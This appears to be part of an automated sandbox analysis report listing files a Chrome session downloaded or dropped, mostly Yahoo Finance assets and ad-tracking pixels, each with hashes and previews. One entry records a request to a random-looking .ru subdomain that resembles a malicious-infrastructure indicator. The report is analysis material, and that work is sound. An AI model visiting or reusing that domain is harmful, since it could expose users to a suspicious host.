                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8011), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8011
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.316788306589243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:V5/60PYKmM4MhvkI2hasDAm2dhdlsjK0k5byY8:V5/dQdMhvn2h8TDQVk5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BE03A375386175922F163856820E511B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DEDFE7DB098533803917FB2055E256E0A352C188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D7EFBA7744C3D8FD4D443EAD201C34896B4534DA4045B05AD3C17F866BC2BDAB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:782BD84ACF15877DE154103103B7259AA7991121FD2AC42BF560620999470132E36270FD1A34DF1D4CA3C28B0DEDC921010A021B0E01ED00579B0C184A556159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/css/react-wafer-games.GamesMini.atomic.ltr.be03a375386175922f163856820e511b.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bdc\(--marshmallow\){border-color:#f5f8fa;border-color:var(--marshmallow)}#atomic .Bdendc\(--hulk-pants\){border-right-color:#7e1fff;border-right-color:var(--hulk-pants)}.tabActive .tabActive_Bdbc\(--grape-jelly\){border-bottom-color:#6001d2!important;border-bottom-color:var(--grape-jelly)!important}#atomic .Bds\(s\){border-style:solid}#atomic .Bdends\(s\){border-right-style:solid}.tabActive .tabActive_Bdbs\(s\){border-bottom-style:solid!important}#atomic .Bdw\(0px\){border-width:0}#atomic .Bdw\(1px\){border-width:1px}#atomic .Bdendw\(6px\){border-right-width:6px}#atomic .Bdendw\(8px\){border-right-width:8px}.tabActive .tabActive_Bdbw\(4px\){border-bottom-width:4px!important}#atomic .Bdrs\(18px\){border-radius:18px}#atomic .Bdrs\(2px\){border-radius:2px}#atomic .Bdrs\(32px\){border-radius:32px}#atomic .Bdrs\(50px\){border-radius:50px}#atomic .Bdrs\(8px\){b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):108433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7560402780996998
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:GbA7Ls5Mm2hV5Mp9ShW0wJ8XvEZavQDOi15AobQoI01Jx9+gm6G3refUrKJMGtVk:/7f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3336CFDF96E1E27066FED0F9A2B90C8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:924EAD7BC69B074CCD1DDBACD342E795AB2B912D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4F67D1D4EE2022832755ACB6EB9C5585B9E3641B6E4B7B7769949CBB11652139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C17D67D3BD48C7EC0AF1846FB1F489F24498EFA55B9599B1F0D8B869EE51A8F15C7CB50FC516BC84210028B52CD7F814074CBD46B275CAEE05606BA5BEB7028E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/eh/prebid-config/finance-us-desktop.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "prebid": {. "adUnits": {. "us_yfin_main_dt_btm_center": {. "pos": 3,. "formats": {. "banner": {. "sizes": [. [. 728,. 90. ],. [. 970,. 250. ]. ]. }. },. "bidders": {. "yahooPrebidServer": {},. "yahooAds": {. "pos": "us_yfin_main_dt_btm_center". },. "pubmatic": {. "adSlot": "5537303". },. "rubicon": {. "zoneId": "3156558". },. "ix": {. "siteId": "1057906
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (18467)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):18563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.367069786955771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:EgTlLhxp1h7YxHVyXI90OrN3jMx1YaihRuBghHm+ghpwxy0Eh:BltP1eOXIGOrN3QxcO+Fm3hWxy0Eh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F6785B5675F597AB29221AD63A71C1AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D9C23EEE74C7A871B04A4B581A66B0EF6F1676D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:049679A615A4FD478198EEC395C0C83ECD736B72CA83CB2C4FC847D64270CDEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:773E545A314F64B66AA68745FDA20F6706E9F3AA36C5DECD5E0D284EF8E7D44901395B759A406F13871584C0489B58723A13ED27A1F163F83905708C7012127F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uc/finance/cosaic/js/finQuote-e859d40f.7868cdbbbb9347a65028.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see finQuote-e859d40f.7868cdbbbb9347a65028.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[6852],{266:(t,e,s)=>{s(5873),s(263),s(2403),s(7083),s(8762),s(6027),s(5316),s(1216),s(1145),s(4039),s(3504);var i=s(4603),n=s(9261),a=s(7816),o=s(714),r=s(1662),l=s(2438);function c(t,e){(function(t,e){if(e.has(t))throw new TypeError("Cannot initialize the same private elements twice on an object")})(t,e),e.add(t)}function h(t,e,s){if("function"==typeof t?t===e:t.has(e))return arguments.length<3?e:s;throw new TypeError("Private element is not present on this object")}const d={upgrades:"positive",downgrades:"negative"};var u=new WeakSet;class p{constructor(t,e,s){c(this,u),this.events={},this.stx=t,this.chartRange=e,this.fireEvent=s,this.showEarnings=!1,this.showEconomicEvents=!1,this.showAnalystRatings=!1,this.eventsQuoteStore=new Map,this.marketLabel="eventsQuote",this.init();const i=docume
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.yieldmo.com/sync?pn_id=rc&id=M1PA0VVQ-I-EWH1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 1 icon, 32x32, 8 bits/pixel
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2238
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.20822051335051
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:susqeZyNQIfmwJ0osmoRvA+SNOFjTLpUdq9nQbAz6jB5UekYpXLimkBbKsVEtotx:survfwvpRUdq9nQjkYAJbK9tmq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3A07174943F82046370997254100D870
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:ECB1E2E89AF0EC6F45F875C22DF0FBD45821BA80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C6F7EE2CADAE2E121342A8C4245141175BFE887776206DEB17149D46CF3AA827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:0A589E20251F62F02C4B96B916FBD9359677A26379D46EEEF4E455464643DE0C9AEEF921AD563D970E7436805DD18AE974DE6942DFDF0C65089512D8A3B2FD35
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/rz/l/favicon.ico
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:...... ..............(... ...@.................................`...a...a...b...c...d...e...f...g...h...i...j...k...l...p...r.. s..$v..)y..+z...|..0}..6...9...;...A...K...L...P...R...T...X...Y...\...k...l...o...p...x...y...~.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):121193
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.374612673753393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:koN+7UOS+mMZo+VqISgLZ2twTMQVr8DQRkIdkIdIZgJadMJbsTrCYk:k2+7MsUB3k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9F93E9A136ACFD22959FEB5E3E1E12C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC5956A417DE9507455085D091811D17B4D3A742
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C14A33EDA9DEA61F335E34AA57A3ABA9803641161669B08B6176D0C4D92C8BC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CB9FADF3A5316594931358DC4EF6656DAB81AB3F51927850DB98BE6C765C157C5174F425AB78CB9610DCB1D770F91CA0B27A03ED5F3D9A905C3992A640CF103A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see consent-1.0.383.js.LICENSE.txt */.!function(){var e={6848:function(e,n,t){var o,i,a;!function(s){"use strict";if(null!=n&&"number"!=typeof n.nodeType)e.exports=s();else if(null!=t.amdO)i=[],void 0===(a="function"==typeof(o=s)?o.apply(n,i):o)||(e.exports=a);else{var r=s(),c="undefined"!=typeof self?self:$.global;"function"!=typeof c.btoa&&(c.btoa=r.btoa),"function"!=typeof c.atob&&(c.atob=r.atob)}}((function(){"use strict";var e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function n(e){this.message=e}return n.prototype=new Error,n.prototype.name="InvalidCharacterError",{btoa:function(t){for(var o,i,a=String(t),s=0,r=e,c="";a.charAt(0|s)||(r="=",s%1);c+=r.charAt(63&o>>8-s%1*8)){if((i=a.charCodeAt(s+=3/4))>255)throw new n("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");o=o<<8|i}return c},atob:function(t){var o=String(t).replace(/[=]+$/,"");if(o.length%4==1)throw new n("'atob' failed:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=triplelift&uid=3811239664715375770435&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9237100146972455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUHl/RPlr02mxhl/E5lmfpse:f9x0Rl/HBse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3F386F5061436A0338A64E0910DB495D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:599FE4A552C991A2B3CE5A1660732BF7B21FB901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0AF3AAE90B7DE9FDCEEE2AB421378EA2F54C74BE81EF43FC6C1790A032755D80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:235479F42CBBE0A4B0100167FECE0D14C9B47D272B3BA8322BCFE8539F055BF31D500E7B2995CC968EBF73034E039F59C5F0F9410428663034BF119D74B5672C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://tags.bluekai.com/site/19505?id=y-prsbu11E2pLfftDV4MA6ec5X3sjgksxWTsM-~A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!..NETSCAPE2.0.....!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4249), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4249
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.242820679038457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:a6z95q7wimgV1H1BSaQg77uSy7hG1UrpsUtKkmxMtP7iCs5wqrtgfP7cujy/L4:a6x5Tg/C1cuS3W6kKpMtPeCPqrSfnjyk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BCDA778B736C3A054AF62F437B536E78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:08E2CDBD2D1CA160834B205D6748DC2CAB5FDD99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:892E2F5E07FEF6DE0428E4DCB284201B3D110C0A6F2D8EF899CD2CD2C61EB546
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A0D6449A03045E723D2F668898541625E36D7394E30327F5E89E1F0640F97A1A0268F500D89E804CD8DC8FBF395DBDFA71B429E89E737E3C2DAC7A2C196EA3A7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/fp/js/tdv2-wafer-utils.customErrorHandler.bcda778b736c3a054af62f437b536e78.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:"use strict";function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}!function(){var e,n,t,o,r=window,a=r.onerror,i=["apptype","rid","bucketId","bucket","device","osName","browserName","browserVersion"],c=/^resource:\/\//,s=/ActionScript|Decompress\sfail/,f={beaconPath:"p.gif",site:"fp"},d=0,w=function(){var e=r.navigator&&(navigator.connection||navigator.mozConnection||navigator.webkitConnection)||{};return{downlink:e.downlink||"",downlinkMax:e.downlinkMax||"",effectiveType:e.effectiveType||"",rtt:e.rtt||"",saveData:e.saveData||"",type:e.type||""}},u=function(){var e=r.YAHOO&&r.YAHOO.context||r.Af&&r.Af.context||{},n="";return i.forEach((function(t){"undefined"!==_typeof(e[t])&&(n+="&".concat(encodeURIComponent(t),"=").concat(encodeURIComponent(e[t])))})),n},g=function(e,n,t,o){if(!(d>3||r.naviga
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ht4hkoldfwqkuse7qoti8nr4vfbfcgkyagnd3phsgq5swccnhjjxv.hocklahro.ru/dyxqqctqfxmdjbdkrdklknqcEsIhjbfqHMJIASFGXPYJHJHBMKSVBSWCVNJCXIPDVXPZRGDUP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163268856699254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHgqOa4JRVFiAdFUvuIIpAdSbF7ev:H69mc4sl3O4gy49FRF0ulS2ev
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3981EFFEFE7AE873DA6E6BDEF640B7A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A36BC42AA70A751143C873C50633C4E82F7C0751
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FB5D1FB998385170F1C64F554B00225B899B03B7EA6B9DC1ACB5139F820A8EEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:354675FDDB540EF73C6375245E87331D67A67F15C1624FCFB515FE6837D821EE3F3FB80FC4E2745ECB4A92C5C72C2393C85DDBE559CB5EEB9CEC30EE3DD45B2E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/keyboard_arrow_up.BbXWGy0y.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M7.41 15.41 12 10.83l4.59 4.58L18 14l-6-6-6 6z"/></svg>';export{s as U};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (53533)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):54823
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.744643224207213
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:jKHH4MUrvOL+TrHhNxsri/Qt0soFO8kVmvS4:PMqLXHTKnoFhkQS4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8EE36C3C8D6D635EF806858E337B7F5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B1A951D6FE40B16BC6757D2AEF66135624200E51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:815F2838118A4996D5A01B93B07BB2E3D1E350750AB06192EFD1D4073865BD33
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5AC31B0DBA9A3EC187885F70F5299BE61F3DA2E5827CD584381DDC5F61CA73531267A5AB68829F2E68538CDAA34E70E9B5C7F37F31DB8F994220B2ABD4552881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pagead2.googlesyndication.com/bg/gV8oOBGKSZbVoBuTsHuy49HjUHUKsGGS79HUBzhlvTM.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function z(B){return B}var H=function(B){return z.call(this,B)},M=function(B,m,v,G,q,Z,y,b,g,t,d,P){for(d=(P=G,22);;)try{if(P==27)break;else if(P==49)P=O.console?40:m;else if(P==G)g=y,b=O.trustedTypes,P=8;else{if(P==B)return g;if(P==8)P=b&&b.createPolicy?9:B;else if(P==9)d=m,g=b.createPolicy(Z,{createHTML:H,createScript:H,createScriptURL:H}),P=m;else{if(P==m)return d=22,g;P==40?(O.console[q](t.message),P=m):P==v&&(d=22,P=49)}}}catch(E){if(d==22)throw E;d==m&&(t=E,P=v)}},O=this||self;(0,eval)(function(B,m){return(m=M(6,29,33,97,"error","bg",null))&&B.eval(m.createScript("1"))===1?function(v){return m.createScript(v)}:function(v){return""+v}}(O)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:application/json;charset
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (301)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.795537284956637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
